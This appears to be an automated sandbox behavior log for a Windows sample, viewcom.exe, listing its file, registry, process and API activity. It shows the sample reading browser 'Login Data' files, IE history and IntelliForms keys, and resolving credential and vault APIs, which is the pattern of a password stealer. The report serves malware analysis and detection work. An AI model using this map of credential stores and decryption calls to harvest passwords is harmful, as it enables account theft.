Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\pnacl\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\pnacl\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwiftShader\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwiftShader\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Apple Computer\Preferences\keychain.plist	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Opera\Opera\wand.dat	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Opera\Opera7\profile\wand.dat	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Roaming\Opera Software\Opera Stable\Login Data	type = file_attributes	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 8, size_out = 8	147	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat	size = 256, size_out = 256	124	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat	size = 8, size_out = 8	124	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat	size = 256, size_out = 256	124	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 8, size_out = 8	77	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 256, size_out = 256	15	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat	size = 384, size_out = 384	2	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat	size = 32, size_out = 32	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat	size = 8, size_out = 8	92	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat	size = 256, size_out = 256	4	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 100, size_out = 100	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 2048, size_out = 2048	4	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Web Data	size = 16, size_out = 16	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 100, size_out = 100	1	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 2048, size_out = 2048	2	Fn Data
Read	C:\Users\ATVeyDl98Z\AppData\Local\Google\Chrome\User Data\Default\Login Data	size = 16, size_out = 16	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 3	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 1	8	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 11	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 9	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 8	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 17	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 15	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 14	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 12	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 13	1	Fn Data
Write	C:\ProgramData\9F1C.tmp	size = 2	1	Fn Data

Registry (29)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin		3	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe		1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin	value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		2	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla		1	Fn

Process (54)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\conhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft.net\gunsmarc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\improve corporate vital.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\adobe\california_hate_gig_hits.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\sc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows defender\cliff_types.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows journal\shakespeare.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\collectables_technical.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\pretty guru.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\received_suggestions_stopped_emphasis.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows journal\emerging anniversary muscle cradle.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows media player\herbs.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\google\paso_nylon_tests.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\uninstall information\statewide-emergency.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\garageopinionsjoycecincinnati.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\java\ping.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows defender\merit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\silent_romantic.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows portable devices\accredited-reject-transmitted.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows portable devices\project kent essay.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft.net\cuisine-programs.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft office\root\office16\winword.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (116)

Operation	Module	Additional Information	Count	Logfile
Load	comctl32.dll	base_address = 0x723c0000	1	Fn
Load	shell32.dll	base_address = 0x764f0000	1	Fn
Load	advapi32.dll	base_address = 0x76030000	2	Fn
Load	pstorec.dll	base_address = 0x72810000	1	Fn
Load	vaultcli.dll	base_address = 0x723a0000	1	Fn
Load	C:\Program Files\Mozilla Firefox\nss3.dll	base_address = 0x5f200000	1	Fn
Load	psapi.dll	base_address = 0x760d0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	22	Fn
Get Handle	C:\Program Files\Mozilla Firefox\nss3.dll	base_address = 0x0	1	Fn
Get Handle	c:\program files\mozilla firefox\nss3.dll	base_address = 0x5f200000	2	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76350000	1	Fn
Get Filename		process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	2	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\taskhost.exe, file_name_orig = C:\Windows\system32\taskhost.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\dwm.exe, file_name_orig = C:\Windows\system32\Dwm.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\taskeng.exe, file_name_orig = C:\Windows\system32\taskeng.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\conhost.exe, file_name_orig = C:\Program Files\Adobe\specifies.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft.net\gunsmarc.exe, file_name_orig = C:\Program Files\Microsoft.NET\gunsmarc.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\msbuild\improve corporate vital.exe, file_name_orig = C:\Program Files\MSBuild\improve corporate vital.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\adobe\california_hate_gig_hits.exe, file_name_orig = C:\Program Files\Adobe\california_hate_gig_hits.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\windows\system32\sc.exe, file_name_orig = C:\Program Files\Google\streamnomirrorsgrew.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows defender\cliff_types.exe, file_name_orig = C:\Program Files\Windows Defender\cliff_types.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows journal\shakespeare.exe, file_name_orig = C:\Program Files\Windows Journal\shakespeare.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft office\collectables_technical.exe, file_name_orig = C:\Program Files\Microsoft Office\collectables_technical.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows sidebar\pretty guru.exe, file_name_orig = C:\Program Files\Windows Sidebar\pretty guru.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\msbuild\received_suggestions_stopped_emphasis.exe, file_name_orig = C:\Program Files\MSBuild\received_suggestions_stopped_emphasis.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows journal\emerging anniversary muscle cradle.exe, file_name_orig = C:\Program Files\Windows Journal\emerging anniversary muscle cradle.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows media player\herbs.exe, file_name_orig = C:\Program Files\Windows Media Player\herbs.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\google\paso_nylon_tests.exe, file_name_orig = C:\Program Files\Google\paso_nylon_tests.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\uninstall information\statewide-emergency.exe, file_name_orig = C:\Program Files\Uninstall Information\statewide-emergency.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows sidebar\garageopinionsjoycecincinnati.exe, file_name_orig = C:\Program Files\Windows Sidebar\garageopinionsjoycecincinnati.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\java\ping.exe, file_name_orig = C:\Program Files\Java\ping.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows defender\merit.exe, file_name_orig = C:\Program Files\Windows Defender\merit.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft office\silent_romantic.exe, file_name_orig = C:\Program Files\Microsoft Office\silent_romantic.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows portable devices\accredited-reject-transmitted.exe, file_name_orig = C:\Program Files\Windows Portable Devices\accredited-reject-transmitted.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\windows portable devices\project kent essay.exe, file_name_orig = C:\Program Files\Windows Portable Devices\project kent essay.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft.net\cuisine-programs.exe, file_name_orig = C:\Program Files\Microsoft.NET\cuisine-programs.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	1	Fn
Get Filename	C:\Program Files\Mozilla Firefox\nss3.dll	process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260	1	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitCommonControlsEx, address_out = 0x723c6be6	1	Fn
Get Address	c:\windows\system32\shell32.dll	function = SHGetSpecialFolderPathW, address_out = 0x76510468	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CryptAcquireContextA, address_out = 0x760391dd	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CryptReleaseContext, address_out = 0x7603e124	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CryptCreateHash, address_out = 0x7603df4e	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CryptGetHashParam, address_out = 0x7603df7e	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CryptHashData, address_out = 0x7603df36	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CryptDestroyHash, address_out = 0x7603df66	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredReadA, address_out = 0x760771c1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredFree, address_out = 0x7603b2ec	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredDeleteA, address_out = 0x76077941	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredEnumerateA, address_out = 0x76077381	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = CredEnumerateW, address_out = 0x76077481	1	Fn
Get Address	c:\windows\system32\pstorec.dll	function = PStoreCreateInstance, address_out = 0x7281526c	1	Fn
Get Address	c:\windows\system32\vaultcli.dll	function = VaultOpenVault, address_out = 0x723a26a9	1	Fn
Get Address	c:\windows\system32\vaultcli.dll	function = VaultCloseVault, address_out = 0x723a2718	1	Fn
Get Address	c:\windows\system32\vaultcli.dll	function = VaultEnumerateItems, address_out = 0x723a3099	1	Fn
Get Address	c:\windows\system32\vaultcli.dll	function = VaultFree, address_out = 0x723a4321	1	Fn
Get Address	c:\windows\system32\vaultcli.dll	function = VaultGetInformation, address_out = 0x723a24c0	1	Fn
Get Address	c:\windows\system32\vaultcli.dll	function = VaultGetItem, address_out = 0x723a3242	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = NSS_Init, address_out = 0x5f2bd70b	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = NSS_Shutdown, address_out = 0x5f2bd13c	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = PK11_GetInternalKeySlot, address_out = 0x5f253c51	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = PK11_FreeSlot, address_out = 0x5f253333	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = PK11_CheckUserPassword, address_out = 0x5f23cbc4	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = PK11_Authenticate, address_out = 0x5f23d3ca	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = PK11SDR_Decrypt, address_out = 0x5f2500a7	2	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_open, address_out = 0x5f361ca0	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_prepare, address_out = 0x5f2ece70	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_step, address_out = 0x5f355200	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_column_text, address_out = 0x5f30d400	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_column_int, address_out = 0x5f30d3a0	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_column_int64, address_out = 0x5f30d3d0	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_finalize, address_out = 0x5f339f60	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_close, address_out = 0x5f33bde0	1	Fn
Get Address	c:\program files\mozilla firefox\nss3.dll	function = sqlite3_exec, address_out = 0x5f33a270	1	Fn
Get Address	c:\windows\system32\psapi.dll	function = GetModuleBaseNameW, address_out = 0x760d152c	1	Fn
Get Address	c:\windows\system32\psapi.dll	function = EnumProcessModules, address_out = 0x760d1408	1	Fn
Get Address	c:\windows\system32\psapi.dll	function = GetModuleFileNameExW, address_out = 0x760d13f0	1	Fn
Get Address	c:\windows\system32\psapi.dll	function = EnumProcesses, address_out = 0x760d1544	1	Fn
Get Address	c:\windows\system32\psapi.dll	function = GetModuleInformation, address_out = 0x760d1420	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetProcessTimes, address_out = 0x7638f626	1	Fn

System (3)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = Operating System		2	Fn
Get Info	type = Hardware Information		1	Fn

Ini (28)

Operation	Filename	Additional Information	Count	Logfile
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = ShowGridLines, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = SaveFilterIndex, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = ShowInfoTip, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = MarkOddEvenRows, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = ShowTimeInGMT, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsIE, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsFirefox, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsChrome, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsOpera, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsSafari, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = LoadPasswordsYandex, default_value = 1	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0	1	Fn
Read	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg	section_name = General, key_name = UseChromeProfileFolder, default_value = 0	1	Fn
